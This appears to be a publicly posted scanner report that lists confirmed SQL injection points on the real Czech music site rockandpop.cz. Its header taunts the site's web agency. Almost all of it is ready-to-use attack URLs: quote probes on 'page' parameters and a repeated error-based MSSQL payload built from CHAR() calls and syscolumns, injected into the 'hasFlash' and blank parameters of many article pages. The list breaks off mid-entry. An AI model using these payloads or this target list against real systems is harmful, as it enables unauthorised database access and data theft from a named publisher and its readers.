rockandpop.cz

1. +++++++++++++++++++++++
2. Sherwood Internet agency i know is a tough kick in the form of critical errors in the music magazine :)
3. --- >> http://www.sherwood.cz
4. +++++++++++++++++++++++
5.  
6. [High Possibility] SQL Injection
7.  
8. Severity: Critical
9. Confirmation: Confirmed
10. URL: http://www.rockandpop.cz/zpravy/?page=%27
11. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
12. Parameter Name: page
13. Parameter Type: Querystring
14. Attack Pattern: %27
15.  
16. Severity: Critical
17. Confirmation: Confirmed
18. URL: http://www.rockandpop.cz/recenze/?page=%27
19. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
20. Parameter Name: page
21. Parameter Type: Querystring
22. Attack Pattern: %27
23.  
24. Severity: Critical
25. Confirmation: Confirmed
26. URL: http://www.rockandpop.cz/live/?page=%27
27. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
28. Parameter Name: page
29. Parameter Type: Querystring
30. Attack Pattern: %27
31.  
32. Severity: Critical
33. Confirmation: Confirmed
34. URL: http://www.rockandpop.cz/clanky/?page=%27
35. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
36. Parameter Name: page
37. Parameter Type: Querystring
38. Attack Pattern: %27
39.  
40. Severity: Critical
41. Confirmation: Confirmed
42. URL: http://www.rockandpop.cz/casopis/?page=%27
43. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
44. Parameter Name: page
45. Parameter Type: Querystring
46. Attack Pattern: %27
47.  
48. Severity: Critical
49. Confirmation: Confirmed
50. URL: http://www.rockandpop.cz/zpravy/zahranicni/?page=%27
51. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
52. Parameter Name: page
53. Parameter Type: Querystring
54. Attack Pattern: %27
55.  
56. Severity: Critical
57. Confirmation: Confirmed
58. URL: http://www.rockandpop.cz/video/?page='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
59. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
60. Parameter Name: page
61. Parameter Type: Querystring
62. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
63.  
64. Severity: Critical
65. Confirmation: Confirmed
66. URL: http://www.rockandpop.cz/zpravy/domaci/koncem-mesice-vyda-vydavatelstvi-emi-jedinecne-album-soliteri/?hasFlash='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&=3
67. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
68. Parameter Name: hasFlash
69. Parameter Type: Querystring
70. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
71.  
72. Severity: Critical
73. URL: http://www.rockandpop.cz/zpravy/domaci/koncem-mesice-vyda-vydavatelstvi-emi-jedinecne-album-soliteri/?hasFlash=true&='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
74. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
75. Parameter Name:
76. Parameter Type: Querystring
77. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
78.  
79. Severity: Critical
80. Confirmation: Confirmed
81. URL: http://www.rockandpop.cz/zpravy/zahranicni/poznejte-obycejny-den-na-turne-prostrednictvim-noveho-videoklipu-the-ghost-inside/?hasFlash='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&=3
82. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
83. Parameter Name: hasFlash
84. Parameter Type: Querystring
85. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
86.  
87.  
88. Severity: Critical
89. Confirmation: Confirmed
90. URL: http://www.rockandpop.cz/zpravy/zahranicni/poznejte-obycejny-den-na-turne-prostrednictvim-noveho-videoklipu-the-ghost-inside/?hasFlash=true&='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
91. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
92. Parameter Name:
93. Parameter Type: Querystring
94. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
95.  
96. Severity: Critical
97. Confirmation: Confirmed
98. URL: http://www.rockandpop.cz/zpravy/domaci/britska-zpevacka-jessie-ware-se-tesi-na-evropske-turne/?hasFlash='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&=3
99. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
100. Parameter Name: hasFlash
101. Parameter Type: Querystring
102. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
103.  
104. Severity: Critical
105. Confirmation: Confirmed
106. URL: http://www.rockandpop.cz/zpravy/domaci/britska-zpevacka-jessie-ware-se-tesi-na-evropske-turne/?hasFlash=true&='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
107. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
108. Parameter Name:
109. Parameter Type: Querystring
110. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
111.  
112. Severity: Critical
113. Confirmation: Confirmed
114. URL: http://www.rockandpop.cz/zpravy/domaci/prazsky-vyber-zverejnil-jmena-hostu-jarniho-turne/?hasFlash='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&=3
115. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
116. Parameter Name: hasFlash
117. Parameter Type: Querystring
118. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
119.  
120. Severity: Critical
121. Confirmation: Confirmed
122. URL: http://www.rockandpop.cz/zpravy/domaci/prazsky-vyber-zverejnil-jmena-hostu-jarniho-turne/?hasFlash=true&='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
123. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
124. Parameter Name:
125. Parameter Type: Querystring
126. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
127.  
128. Severity: Critical
129. Confirmation: Confirmed
130. URL: http://www.rockandpop.cz/zpravy/zahranicni/marilyn-manson-zkolaboval-v-prubehu-koncertu/?hasFlash='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&=3
131. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
132. Parameter Name: hasFlash
133. Parameter Type: Querystring
134. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
135.  
136. Severity: Critical
137. Confirmation: Confirmed
138. URL: http://www.rockandpop.cz/zpravy/zahranicni/marilyn-manson-zkolaboval-v-prubehu-koncertu/?hasFlash=true&='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
139. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
140. Parameter Name:
141. Parameter Type: Querystring
142. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
143.  
144. Severity: Critical
145. Confirmation: Confirmed
146. URL: http://www.rockandpop.cz/zpravy/zahranicni/americti-confide-se-hlasi-ze-studia-a-pridavaji-ochutnavku/?hasFlash='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&=3
147. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
148. Parameter Name: hasFlash
149. Parameter Type: Querystring
150. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
151.  
152. Severity: Critical
153. Confirmation: Confirmed
154. URL: http://www.rockandpop.cz/zpravy/zahranicni/americti-confide-se-hlasi-ze-studia-a-pridavaji-ochutnavku/?hasFlash=true&='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
155. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
156. Parameter Name:
157. Parameter Type: Querystring
158. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
159.  
160. Severity: Critical
161. Confirmation: Confirmed
162. URL: http://www.rockandpop.cz/zpravy/domaci/o5-a-radecek-opici-turne-zacne-koncertem-v-primem-prenosu/?hasFlash='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&=3
163. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
164. Parameter Name: hasFlash
165. Parameter Type: Querystring
166. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
167.  
168. Severity: Critical
169. Confirmation: Confirmed
170. URL: http://www.rockandpop.cz/zpravy/domaci/o5-a-radecek-opici-turne-zacne-koncertem-v-primem-prenosu/?hasFlash=true&='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
171. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
172. Parameter Name:
173. Parameter Type: Querystring
174. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
175.  
176.  
177. Severity: Critical
178. Confirmation: Confirmed
179. URL: http://www.rockandpop.cz/zpravy/domaci/monkey-business-vydaji-nove-album-a-vyjedou-na-turne/?hasFlash='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&=3
180. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
181. Parameter Name: hasFlash
182. Parameter Type: Querystring
183. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
184.  
185. Severity: Critical
186. Confirmation: Confirmed
187. URL: http://www.rockandpop.cz/zpravy/domaci/monkey-business-vydaji-nove-album-a-vyjedou-na-turne/?hasFlash=true&='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
188. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
189. Parameter Name:
190. Parameter Type: Querystring
191. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
192.  
193.  
194. Severity: Critical
195. Confirmation: Confirmed
196. URL: http://www.rockandpop.cz/zpravy/domaci/chiki-liki-tu-a:-1000-koncertov-15-krajin-a-230-miest/?hasFlash='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&=3
197. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
198. Parameter Name: hasFlash
199. Parameter Type: Querystring
200. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
201.  
202. Severity: Critical
203. Confirmation: Confirmed
204. URL: http://www.rockandpop.cz/zpravy/domaci/chiki-liki-tu-a:-1000-koncertov-15-krajin-a-230-miest/?hasFlash=true&='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
205. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
206. Parameter Name:
207. Parameter Type: Querystring
208. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
209.  
210. Severity: Critical
211. Confirmation: Confirmed
212. URL: http://www.rockandpop.cz/zpravy/zahranicni/bruno-mars-predstavuje-klip-k-singlu-when-i-was-your-man/?hasFlash='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&=3
213. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
214. Parameter Name: hasFlash
215. Parameter Type: Querystring
216. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
217.  
218. Severity: Critical
219. Confirmation: Confirmed
220. URL: http://www.rockandpop.cz/zpravy/zahranicni/bruno-mars-predstavuje-klip-k-singlu-when-i-was-your-man/?hasFlash=true&='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
221. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
222. Parameter Name:
223. Parameter Type: Querystring
224. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
225.  
226. Severity: Critical
227. Confirmation: Confirmed
228. URL: http://www.rockandpop.cz/zpravy/zahranicni/kanadsti-billy-talent-prichazeji-s-novym-videoklipem/?hasFlash='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&=3
229. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
230. Parameter Name: hasFlash
231. Parameter Type: Querystring
232. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
233.  
234. Severity: Critical
235. Confirmation: Confirmed
236. URL: http://www.rockandpop.cz/zpravy/zahranicni/my-chemical-romance-streamuji-posledni-cast--conventional-weapons/?hasFlash=true&='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
237. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
238. Parameter Name:
239. Parameter Type: Querystring
240. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
241.  
242. Severity: Critical
243. Confirmation: Confirmed
244. URL: http://www.rockandpop.cz/live/young-guns-your-demise-criminal-colection-9-11-rock-cafe-praha/?hasFlash='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&=3
245. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
246. Parameter Name: hasFlash
247. Parameter Type: Querystring
248. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
249.  
250. Severity: Critical
251. Confirmation: Confirmed
252. URL: http://www.rockandpop.cz/foto/?hasFlash=true&='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
253. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
254. Parameter Name:
255. Parameter Type: Querystring
256. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
257.  
258. Severity: Critical
259. Confirmation: Confirmed
260. URL: http://www.rockandpop.cz/clanky/mlada-krev-rock-pop/?hasFlash='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&=3
261. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
262. Parameter Name: hasFlash
263. Parameter Type: Querystring
264. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
265.  
266. Severity: Critical
267. Confirmation: Confirmed
268. URL: http://www.rockandpop.cz/clanky/mlada-krev-rock-pop/?hasFlash=true&='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
269. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
270. Parameter Name:
271. Parameter Type: Querystring
272. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
273.  
274. Severity: Critical
275. Confirmation: Confirmed
276. URL: http://www.rockandpop.cz/clanky/mlada-krev-rock-pop/tribal-theory-funky-rock-n-roll-ze-zapadnich-cech/?hasFlash='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&=3
277. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
278. Parameter Name: hasFlash
279. Parameter Type: Querystring
280. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
281.  
282. Severity: Critical
283. Confirmation: Confirmed
284. URL: http://www.rockandpop.cz/clanky/mlada-krev-rock-pop/tribal-theory-funky-rock-n-roll-ze-zapadnich-cech/?hasFlash=true&='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
285. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
286. Parameter Name:
287. Parameter Type: Querystring
288. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
289.  
290. Severity: Critical
291. Confirmation: Confirmed
292. URL: http://www.rockandpop.cz/clanky/mlada-krev-rock-pop/overhype-nadejna-kapela-z-brna/?hasFlash='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&=3
293. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
294. Parameter Name: hasFlash
295. Parameter Type: Querystring
296. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
297.  
298. Impact
299. Severity: Critical
300. Confirmation: Confirmed
301. URL: http://www.rockandpop.cz/clanky/mlada-krev-rock-pop/overhype-nadejna-kapela-z-brna/?hasFlash=true&='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
302. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
303. Parameter Name:
304. Parameter Type: Querystring
305. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
306.  
307. Severity: Critical
308. Confirmation: Confirmed
309. URL: http://www.rockandpop.cz/video/rock-pop-tv-jiz-brzy/?hasFlash='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&=3
310. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
311. Parameter Name: hasFlash
312. Parameter Type: Querystring
313. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
314.  
315. Severity: Critical
316. Confirmation: Confirmed
317. URL: http://www.rockandpop.cz/video/rock-pop-tv-jiz-brzy/?hasFlash=true&='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
318. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
319. Parameter Name:
320. Parameter Type: Querystring
321. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
322.  
323. Severity: Critical
324. Confirmation: Confirmed
325. URL: http://www.rockandpop.cz/video/branit-ve-cteni-casopisu-rock-pop-se-nevyplaci/?hasFlash='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&=3
326. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
327. Parameter Name: hasFlash
328. Parameter Type: Querystring
329. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
330.  
331. Severity: Critical
332. Confirmation: Confirmed
333. URL: http://www.rockandpop.cz/video/20-narozeniny-s-rock-pop-a-imodium/?hasFlash='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&=3
334. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
335. Parameter Name: hasFlash
336. Parameter Type: Querystring
337. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
338.  
339. ImpactSeverity: Critical
340. Confirmation: Confirmed
341. URL: http://www.rockandpop.cz/video/20-narozeniny-s-rock-pop-a-imodium/?hasFlash=true&='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
342. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
343. Parameter Name:
